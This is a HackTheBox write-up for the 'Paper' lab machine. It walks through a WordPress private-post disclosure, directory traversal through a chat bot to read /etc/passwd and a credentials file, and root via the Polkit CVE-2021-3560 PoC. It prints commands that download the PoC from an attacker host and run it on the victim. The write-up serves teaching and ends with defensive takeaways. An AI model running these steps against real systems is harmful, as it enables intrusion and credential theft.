Paper – HackTheBox Writeup
Machine Name: Paper
IP: 10.10.11.143
Difficulty: Easy
Summary
Paper is a relatively easy box that teaches enumeration and a bit of reading API documentation. It forces the attacker to keep looking for sensitive information that can be used to run commands and eventually get a shell. To get a user shell, we find credentials on the system through a chat bot; they can be used to log in over SSH. Another way is to find a command hidden from the ones listed by the bot, either by reading the API documentation or by finding a scripts directory, and use it to run commands as the user and get a shell. Escalating privileges to root was simple, as the system was vulnerable to a well-known vulnerability with a simple PoC.
Information Gathering
The first step, as always, is to perform an Nmap scan.
SSH is open, Apache server is running on port 80, and SSL is enabled for the same Apache server.
The web server at http://10.10.11.143/ shows the default Apache test page. Nothing interesting in the source code either. Then I ran gobuster to look for interesting directories.
Gobuster’s output was not interesting either. I had already added paper.htb to my hosts file. I tried to get the response headers using curl and found something interesting.
“office.paper” is the backend server. Let’s add that to the hosts file.
10.10.11.143 paper.htb
10.10.11.143 office.paper
The website is a WordPress blog. I checked the posts’ content and found an interesting comment on the “Feeling Alone!” post.
Checking the source, I observed that the website is running WordPress 5.2.3. This can also be found with the Wappalyzer browser extension.
Let’s use searchsploit to check if there are any existing vulnerabilities for this version.
“Viewing Unauthenticated/Password/Private Posts” seems interesting, especially after the comment I found on the “Feeling Alone” post.
Looking at the PoC for the vulnerability, one can easily view private posts by appending “?static=1” to the URL.
Visiting “http://office.paper/?static=1”, we are presented with a page containing information about a new employee chat system.
Exploring the link “http://chat.office.paper/register/8qozr226AhkCHZdyY” further, after adding chat.office.paper to the hosts file, we land on a registration page. After registering, we see a #general channel with a bot named “recycleops” that has posted a message about its use.
We can list and fetch files. I DM’d the bot and tried “list” as a command.
I first tried a directory traversal (LFI) by doing a “../../../../../etc/passwd” to find users.
We see that the user is dwight.
Getting Low Privilege Shell
Then it took me a lot of searching, listing files and checking to finally land on the file “../hubot/.env”, which contains some sensitive information.
We got credentials! Let’s try using them on the open SSH port.
We successfully login and capture the user flag.
I tried capturing the flag with the bot but an “access denied” message was sent back.
I even tried doing some command injection but it didn’t work.
I was wondering if there was a way to run commands through the bot. I looked at the Rocket.Chat API site and found that there was indeed a way to run commands.
Let’s have a look at the scripts directory.
All the commands listed by the bot are implemented in those JavaScript files. Interestingly, “run.js” is missing from the commands the bot lists. Let’s peep in!
We can indeed run commands through this. Let’s get a shell!
If we weren’t able to gain SSH access using the credentials and this was the only way in, we’d proceed to gain persistence by adding our public key to the authorized_keys file on the victim.
That was fun sneaking around and finding some sensitive and interesting information and using that to gain a low privileged shell. Let’s move on to escalating our privileges to root…
Privilege Escalation
Running linpeas, the script suggests the Pwnkit exploit.
I simply downloaded the PoC script from secnigma’s GitHub (the creator of this machine) to my attacker machine, then transferred it to the victim and ran the script. It took me a few attempts for the script to work. Sometimes it does not authenticate even if the user is created. It finally worked and I got root!
# On the attacker machine: fetch the PoC and serve it over HTTP
wget https://raw.githubusercontent.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation/main/poc.sh
python -m http.server
# On the victim: download and run the PoC
cd /tmp
wget http://10.10.16.22:8000/poc.sh
vi poc.sh   # Change the username and password or use the default.
chmod +x poc.sh
./poc.sh
su - sid
sudo bash
Pwned!
Takeaways from this box would be:
- Keep applications running in production up to date. In this case, the website was running an older, vulnerable version of WordPress.
- Disable any way to “run” commands. Hiding features won’t suffice.
- Do not reuse passwords.
- Always keep the OS updated. In this case, the Linux system was vulnerable to a Polkit privilege escalation.